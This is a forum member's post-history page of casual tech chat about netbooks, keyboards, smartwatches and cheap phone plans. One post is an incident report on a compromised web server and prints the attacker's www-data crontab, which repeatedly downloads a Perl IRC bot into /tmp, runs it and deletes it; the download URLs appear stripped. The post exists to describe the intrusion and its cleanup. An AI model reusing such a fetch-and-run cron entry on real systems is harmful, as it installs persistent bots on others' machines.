Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Pinako

Pages: [1] 2 3 ... 76
General Chat / Re: Uses for an old Atom netbook in 2014?
« on: Today at 11:30:06 AM »
You could use it as a management terminal for your servers :D

Maybe a [bulky] digital picture frame?

General Chat / Re: Mobile Keyboard recommendations?
« on: Today at 11:26:37 AM »
Yeah, that layout looks slightly difficult to use. I've got an HP K4000 keyboard (refurbished for $15 recently) that has been working great for the past couple of months. It sleeps well, wakes promptly, and types comfortably.

My AmazonBasics keyboard looks similar (i.e. sleek) and worked well for ~8 months before it started getting flaky; the version for iDevices has an extra row of keys, which I appreciated.

I've also tried the bottom-of-the-barrel keyboards i.e. Anker, iClever, etc. They're good for most purposes, and the main problem is that they might take a second to wake up after some inactivity; there might also be some occasional repeated/dropped keystrokes. It happens often enough to be a minor annoyance at times, but shouldn't be a problem for light-duty work.

I was thinking it got installed on Sept 14th ;) still no sign of recurrence.

I agree.

Then again, I wanna see what this clever bot could do ;)
The damage potential is low: the host is behind a NAT device and the only publicly-mapped port is 80. Ofc, it could call home with all kinds of data, spew some spam, DoS some targets, etc. It's fun to live dangerously.

No attack source IP's... but the attacker isn't exactly discreet about flaunting his/her domain name.

5 went down last night, so I decided to investigate. When I logged in, I found:

$ ps aux | grep apache
www-data  3454  0.0  0.8  32032  4168 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9236  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9250  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9264  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
... ... ...

... and so on. There were dozens of processes named /usr/bin/apachessl and no memory left. All the processes were owned by www-data (the web server's account) and children of init (i.e. daemonized). When I killed these processes, they returned after a few minutes. At first glance, one might conclude that something was making the web server fork out of control.

The kicker was that 1) I use nginx, 2) I don't have apache installed, and 3) there's no /usr/bin/apachessl on the filesystem. Wait, what?

Suspecting that some rogue process was renaming itself to avoid detection, I dug around under /proc to locate the executable image. It turned out to be none other than the Perl interpreter. This was a Perl script.

Checking my crontabs, I found:

$ cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sun Sep 14 02:20:01 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * cd /tmp;wget;curl -O;perl abc.txt;rm -f abc.txt
*/30 * * * * cd /tmp;wget;curl -O;perl xyz.txt;rm -f xyz.txt

Whoa! I don't remember installing this crontab. Here's a pastebin mirror of abc.txt. Doesn't it look like a bot that calls home to an IRC server? Yet, this is no ordinary IRC server: it runs on port 8080 and speaks HTTP at first (fooling some intrusion detection systems), but quickly switches to IRC. Unfortunately, I wasn't able to retrieve xyz.txt.

So I killed all the rogue processes, cleaned up the crontab, and rebooted; so far, the processes haven't returned. I also updated/reinstalled Wordpress for good luck :)

What do you think?

General Chat / Re: Does anyone know how....
« on: September 19, 2014, 09:11:19 PM »
Windows is setup on a separate partition.
I'm tempted to put Windows 8 on a USB disk. WinXP was the last Windows release that worked well on USB for me.

General Chat / Re: Apple Watch
« on: September 14, 2014, 11:41:24 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently...
Keep in mind the Galaxy Gear REQUIRES a Samsung smartphone - it won't work with just any Android device, iirc. But if you're talking about just using it for the screen, you might be able to do that with some hardware magic.

Yeah, you do need a Galaxy Gear approved phone to activate the first generation Galaxy Gear before you could root and reflash it; after that, it'd work with any Android device and function pretty much independently. If you're sneaky enough, you could probably do this at the store ;)

General Chat / Re: Apple Watch
« on: September 14, 2014, 10:06:32 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently... it might be a combination of age and competition from Apple. I'm not quite sold on the idea of gaming on a smart watch, but the whole thing might be small enough to embed into a controller, gameboy-style.

General Chat / Re: Apple Watch
« on: September 09, 2014, 04:39:54 PM »
Heh, that looks like an iPod Nano with a strap... not bad. But gold that's twice as hard as standard gold? I guess that's Apple-speak for impurities. What do you think of LG's G Watch R?

General Chat / Re: The Cheapest Smartphone Plan
« on: September 08, 2014, 08:24:05 PM »
A fake one? A virtual one :) See if your credit card company offers this handy feature. It might even let you set limits.

The thing to look out for, though, is using more data than you intended. They do cut you off at 400 mb, but the lagging reporting system would allow you to run up the extra bytes if you worked quickly enough. And you gotta call to switch to the free plan. Not that it matters... because they've sold out ???

General Chat / Re: I'm back | yet again.
« on: September 08, 2014, 05:48:10 AM »
Hey now. It's a communicable disease.


General Chat / Re: The Cheapest Smartphone Plan
« on: September 08, 2014, 05:44:21 AM »
Is it worth generating a one-time credit card number for a $25 media player? They've also been around for a while, and I think they plan to stick around for a while longer.

General Chat / Re: The Cheapest Smartphone Plan
« on: September 07, 2014, 11:02:00 AM »
It's a $25 media player :) (oh yeah, and free Sprint 3G/WiMAX service if you wanna use it)

General Chat / Re: Gitlab
« on: September 05, 2014, 05:39:11 PM »
I've tried Gitlab. It's cool. Gitolite works well for a far simpler system.

General Chat / Re: Weekend code project
« on: August 29, 2014, 11:19:12 PM »
Ooh, a TiVo for radio shows. Does it skip commercials, too? ;)
Excellent work. Thanks for sharing.

General Chat / Re: Does anyone know how....
« on: August 29, 2014, 04:20:45 PM »
I haven't gone as far as serving up home directories on the network, but I can imagine how it's done... so yeah, it's just a plain old samba/nfs share. Portable apps are nice because of the package manager. Next on the roadmap is portable file type associations.

General Chat / Re: Books
« on: August 28, 2014, 10:36:31 PM »
They sure do. And then there's

General Chat / Re: Books
« on: August 28, 2014, 04:56:26 PM »

General Chat / Re: My new little project (pinako might like this)
« on: August 24, 2014, 11:01:28 PM »
Make it happen. Also, install a few more monitors:

General Chat / Re: Does anyone know how....
« on: August 24, 2014, 10:57:08 PM »
Yeah, well... I try to make it really easy to reinstall. This means Dropbox, network storage, PortableApps, and installer backups :3

Pages: [1] 2 3 ... 76